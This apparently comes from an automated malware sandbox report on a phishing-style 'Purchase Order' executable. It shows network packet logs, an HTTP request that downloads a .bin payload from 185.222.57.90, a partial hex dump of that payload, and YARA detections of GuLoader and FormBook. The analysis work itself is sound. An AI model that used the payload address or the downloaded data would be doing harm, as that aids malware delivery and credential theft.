                                            Nov 18, 2024 18:11:17.863163948 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.863218069 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.863284111 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.863300085 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.863341093 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.863341093 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.863609076 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.863620043 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.863631010 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.863651037 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.863672972 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.863697052 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.864363909 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.864387989 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.864398003 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.864413977 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.864434958 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.864459038 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.906606913 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.906646967 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.906658888 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.906833887 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.907042027 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.907102108 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.907291889 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.907319069 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.907361984 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.908052921 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.951765060 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.951864004 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.951869011 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.951908112 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.987945080 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.988069057 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.988151073 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.988209009 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.988215923 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.988270044 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.988563061 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.988599062 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.988627911 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.988636017 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.988660097 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.988688946 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.989319086 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.989355087 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.989384890 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.989392996 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.989396095 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.989428997 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.989892006 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.989945889 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.989947081 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.989983082 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.989995956 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.990036011 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.990679979 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.990717888 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.990735054 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.990751028 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.990770102 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.990794897 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.023771048 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.023880005 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.023902893 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.023915052 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.023931980 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.023958921 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.024849892 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.024887085 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.024914980 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.024935961 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.126004934 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.126051903 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.126069069 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.126127958 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.126168966 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.126533031 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.126550913 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.126566887 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.126590014 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.126622915 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.127219915 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.127237082 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.127254963 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.127275944 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.127306938 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.127922058 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.127938986 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.127962112 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.127980947 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.128011942 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.128668070 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.128689051 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.128705978 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.128716946 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.128724098 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.128746033 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.128779888 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.143336058 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.143389940 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.143404007 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.143414974 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.143456936 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.143456936 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.143758059 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.143771887 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.143795967 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.143809080 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.143815994 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.143845081 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.143846035 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.143872976 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.144515038 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.144567966 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.252216101 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252237082 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252250910 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252264023 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252278090 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252290964 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252336025 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.252397060 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.252489090 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252504110 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252515078 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.252562046 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.252562046 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.253124952 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.253168106 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.253180981 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.253221035 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.253876925 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.253894091 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.253905058 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.253937960 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.253967047 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.254266024 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.254282951 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.254312992 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.254332066 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.254679918 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.254724979 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.258568048 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.258585930 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.258635998 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.258694887 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.258708954 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.258722067 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.258742094 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.258774042 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.259212971 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.259265900 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:18.259356022 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:18.259407043 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:54.993544102 CET4971180192.168.2.8185.222.57.90

                                            HTTP Request Dependency Graph

                                            • 185.222.57.90

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.849711185.222.57.90806892C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 18, 2024 18:11:15.523874044 CET175OUTGET /zFSrvbrRquo53.bin HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                            Host: 185.222.57.90
                                            Cache-Control: no-cache
                                            Nov 18, 2024 18:11:16.708092928 CET1236INHTTP/1.1 200 OK
                                            Content-Type: application/octet-stream
                                            Last-Modified: Sun, 17 Nov 2024 17:32:38 GMT
                                            Accept-Ranges: bytes
                                            ETag: "2aaa7eb21639db1:0"
                                            Server: Microsoft-IIS/10.0
                                            Date: Mon, 18 Nov 2024 17:11:16 GMT
                                            Content-Length: 290368
                                            Data Raw: 61 45 2e 53 76 ef e2 78 23 74 30 ca 69 b2 6f ce 27 99 69 64 03 42 74 3d c6 98 29 07 86 8c 60 83 95 67 6a 7f 8c 01 16 38 31 ee 02 02 2f 63 f7 d6 54 4d 16 7a d0 9b e5 8b b7 3f ff 0b d7 76 75 ac f8 b3 bc 2f 51 05 03 22 0c 24 56 eb 5c 3d 77 c0 1c 42 c0 41 45 a1 f3 c7 0d b3 a2 6f 07 1b 10 b1 a9 a3 40 c7 62 a5 b6 be 62 16 58 3b 73 72 07 85 fb 28 67 58 7f bc be da 47 20 c2 a1 64 04 87 1f 73 7c af e8 3a c6 af 4d 9f 06 83 9d 92 98 97 cf 26 3a a5 e5 07 05 cd a0 85 bd 45 b5 a4 75 16 91 22 08 0b 31 a1 9c 12 0a 02 4e 9d 6d ab 72 7f 3e ea 09 44 53 40 bd 28 9f 50 01 dc 69 23 29 3b d2 25 61 55 04 e3 08 17 7e 55 e3 39 4b 6d 90 c4 b1 51 3e ca 9e b0 4b a1 76 15 82 42 7f 83 82 8c 47 40 c7 fb a9 9a 0a 8f 7c f6 61 55 54 5c 25 8a 08 e5 8a 85 58 df 4b 7a 78 f2 00 f7 27 c7 48 7c 1b 6b 06 da 7d c8 21 73 bf f6 50 58 00 f9 2c e1 70 35 31 94 3e 9b 67 10 80 d6 7e c0 a2 31 1d 4d b0 f3 aa 72 7f 2f f3 ce db 86 b8 f5 82 d6 af a5 5d 3c 3a d4 5b bf bb 9b 32 8e 1f df b1 9e dc 1c 69 f4 aa 80 78 40 d5 95 19 cf 75 fa 38 34 ff 6a a0 bd df [TRUNCATED]
                                            Data Ascii: aE.Svx#t0io'idBt=)`gj81/cTMz?vu/Q"$V\=wBAEo@bbX;sr(gXG ds|:M&:Eu"1Nmr>DS@(Pi#);%aU~U9KmQ>KvBG@|aUT\%XKzx'H|k}!sPX,p51>g~1Mr/]<:[2ix@u84j$ <Tuwa[ND]zeh[Ds2d$XGD1PT1,:520]{x17zQh[dW7T^EUMGDqC0O^Bv;=3j<J6i,Z%]>&]y%FT)XIYw 2\7M(N[}-W)$]}D.p?3@5=<-PuR0}WuIAn6@~<.YU8g6~F]!lI4He1OW;~w6d1>3MA]c"b_=*pC(\l1yT<.C!.L<`+fYH>Scn@?bL2\N4kT+[xbswytI50Oexy]2}!z?d*|xiqE%d6KnDpao>][fU2'^rNU*e<N&Kcl|l7wNV
                                            Nov 18, 2024 18:11:16.708117962 CET1236INData Raw: 7f 36 e7 9c dc fa 5e 28 07 b5 19 5b 44 0f a1 59 19 c4 ea 4f af 10 06 90 cc 37 a5 ec c4 15 fa b9 78 23 48 ce 48 57 d5 20 c4 11 25 02 bc 6d c6 07 6a c0 78 b1 d4 84 aa 5b 27 62 e6 69 ca 87 d4 a7 f7 8e f1 e2 54 13 06 ae f2 8c bc 95 66 cf 27 2b 5a 0a
                                            Data Ascii: 6^([DYO7x#HHW %mjx['biTf'+Z[_2{[x{N3&S+*9 7lTT*Y3Mxz49|,@@#GT,Sb]D}Q/UOb|2uUVYM|2:-W}4"&.y|.gJ);PS%
                                            Nov 18, 2024 18:11:16.708144903 CET424INData Raw: a3 06 b2 a3 5d 7a 65 17 18 68 92 05 fa 95 af 5b 44 fc e5 73 32 85 1e 64 df 83 ee 99 d0 91 24 58 f0 ff cd 1d 47 44 31 50 54 31 84 e4 2c 3a 9f 35 e9 e1 32 e2 19 92 30 0f e3 8d 99 5d 98 17 7b 78 c2 d2 c4 31 81 ae 8a 37 7a 10 05 c9 f1 e8 51 dd 68 a1
                                            Data Ascii: ]zeh[Ds2d$XGD1PT1,:520]{x17zQh[dW7T^EUMGDqC0O^Bv;=3:8J6ip^%]>&]y%FT)XIYw 2\7M(N[}-W)$]}D.p?3
                                            Nov 18, 2024 18:11:16.708380938 CET1236INData Raw: 06 66 e1 bb 59 e0 93 b3 48 0f e5 d3 13 d4 af 3e db 53 63 6e 40 e3 3f 62 08 e3 fb 96 15 4c 32 d4 f6 5c 4e 34 e2 6b fe 54 8d 0a 19 2b 5b 04 78 d1 c7 b3 1f 0f 05 62 f9 8c e9 73 12 da f7 ec f5 77 9c a0 79 74 b5 49 e1 35 bc eb 30 4f 08 1f 65 80 ce e2
                                            Data Ascii: fYH>Scn@?bL2\N4kT+[xbswytI50Oexy]2}!z?d*|xiqE%d6KnDpao>][fU2'^rNU*e<N&Kcl|l7wNV6^([DYO7x#HHW %
                                            Nov 18, 2024 18:11:16.708395958 CET1236INData Raw: 4d ef 3d 2c 1e 87 66 20 36 6e b0 25 95 74 01 dc 69 23 29 3b d2 5c 60 5c a4 de 68 70 8d 68 83 5e b8 50 f0 a3 42 4b 98 62 6d 8a 2b c6 85 0f 24 e8 8c bf e2 eb b4 5a 61 50 5a a6 6a e8 8f a4 08 36 3c 61 45 ed fb e5 8a 85 58 df 4b 7a 78 a2 45 f7 27 8b
                                            Data Ascii: M=,f 6n%ti#);\`\hph^PBKbm+$ZaPZj6<aEXKzxE'I}|3n!sPX,q>0>;~1Mr/]<*[2ix@84j$"|uwa[ND]zeh[Ds2d$XGD1PT1
                                            Nov 18, 2024 18:11:16.708832979 CET424INData Raw: 1d dc 56 6c 97 49 c0 de e8 0e f0 37 88 e2 cd f4 fb 99 94 b7 21 b1 99 24 72 48 83 4f fc 85 c6 fc 8d e2 e4 6b b5 9c a8 60 f4 c1 6f cd 87 96 f6 99 fc 61 06 4e 14 b0 35 32 69 da 5a ae 10 cc 4b 88 81 f3 7f da 4f 3e ad 53 61 ef 5e 9d 2d 9e 4e 81 ea c5
                                            Data Ascii: VlI7!$rHOk`oaN52iZKO>Sa^-NwPb:)}t5]{qJ*J^]Ohqo2ZK1wIPb-9Imj[Fgm5HM[qw]Z$,UaqcUp]R<Sg4
                                            Nov 18, 2024 18:11:16.708849907 CET1236INData Raw: 6e 7e 79 61 f8 ed 43 13 6b f7 49 ab 32 01 3f c1 4c 32 1b 43 ce 59 58 5c 82 52 69 bf 9a 0c 30 e1 59 30 81 17 84 f5 7f 30 30 43 78 47 c0 19 25 bf 04 54 cc bc da d6 ca 11 c3 b4 b4 83 5d da c5 27 ec be 3d 6f 68 31 4d 3c e6 a0 f7 4c 14 14 31 b5 de 55
                                            Data Ascii: n~yaCkI2?L2CYX\Ri0Y000CxG%T]'=oh1M<L1UGY8lDi=XBY=&?[U-^/VI]^S`'Mlz470CAf}Wa@Z$AkREmujS'umlD(%AO%Bd%e6wsO{`iaI)G
                                            Nov 18, 2024 18:11:16.708863974 CET212INData Raw: b2 ee 21 d8 1a 43 99 49 86 8c a5 a5 8b c1 e8 85 75 b2 54 37 76 03 97 cd 93 82 05 17 27 45 06 9d f2 d4 b3 3b 50 8e 42 df e2 40 3c 7f 51 77 ff de 8f c3 3a 5d b2 da 93 f2 c9 55 ce ca 41 56 bf 11 3d 66 dd 2f 85 2e fb c1 28 91 86 13 83 92 33 9b bc 04
                                            Data Ascii: !CIuT7v'E;PB@<Qw:]UAV=f/.(3CL`FHl|0Tj~jn>h\_wE@02#X$p.^gcw-t+euaEYj5&WcgZvbe
                                            Nov 18, 2024 18:11:16.708877087 CET1236INData Raw: 89 7f 4c c5 49 f3 ae cb a3 99 24 3e 75 c4 c1 1f bd 89 26 50 db 5f 5e 19 88 76 99 34 c1 66 81 6b 49 de 93 00 27 79 f8 ff bc 55 59 03 da 5a 6a 7c 6f fd 84 76 9e 0a 80 b5 38 26 91 18 5a 00 d2 41 e0 e2 7a 4e ed db 35 03 0f 3b 04 bf 7b 89 27 8f fd fb
                                            Data Ascii: LI$>u&P_^v4fkI'yUYZj|ov8&ZAzN5;{'?k"D`'wvHyN~@Y-*!Ti*pSX@*_99'42yKLLZeLE[$=wJ?p/;jo>|MwVT y46I{#*9+5
                                            Nov 18, 2024 18:11:16.708892107 CET212INData Raw: f6 49 6b 12 7f 49 0f e5 9b 43 be ae 6f 33 16 75 6e 40 69 ef e9 4d f3 78 52 19 c4 67 2b c5 95 74 60 ea 6f 8a 53 cc 31 d6 5d ae ef 7c 17 82 4c 1f 84 48 f2 41 47 d1 73 12 60 f5 ec f5 77 a7 6a 76 3b 7f 01 94 cd 35 a6 a0 c4 45 eb e0 49 ba fc 2d 7e f4
                                            Data Ascii: IkICo3un@iMxRg+t`oS1]|LHAGs`wjv;5EI-~W]2&BIS>csZE<t66Dp3s/]G+(TaC'#4^l%_g,=;f:zwr40.$
                                            Nov 18, 2024 18:11:16.715008974 CET1236INData Raw: 29 4f 15 0c 17 83 22 d9 5e c0 4e ef 17 d4 00 bb f3 e1 89 26 57 54 17 ad c8 d4 25 02 bc 6d ed cf e1 03 53 70 a1 87 29 98 25 e3 1d 02 a0 87 d4 db 25 05 b4 f2 df 93 ca af f2 8c f4 ae 9e c0 a5 e3 a4 f5 a4 e6 ce 6e c2 7b e3 9b ac 7a fa b9 2e 30 29 e7
                                            Data Ascii: )O"^N&WT%mSp)%%n{z.0)hUV5HLTJwzu@P^xqr[NI@QPTh"b]}j%EJ6,$V7`g(=.!7LZ9Oks_mol+*2^F-q(ca$G1}


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:12:10:08
                                            Start date:18/11/2024
                                            Path:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
                                            Imagebase:0x400000
                                            File size:724'333 bytes
                                            MD5 hash:B9A03FB0C2C7F23A1E4CCB0D79C5053C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1990093739.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:12:11:05
                                            Start date:18/11/2024
                                            Path:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
                                            Imagebase:0x400000
                                            File size:724'333 bytes
                                            MD5 hash:B9A03FB0C2C7F23A1E4CCB0D79C5053C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Disassembly

                                            Reset < >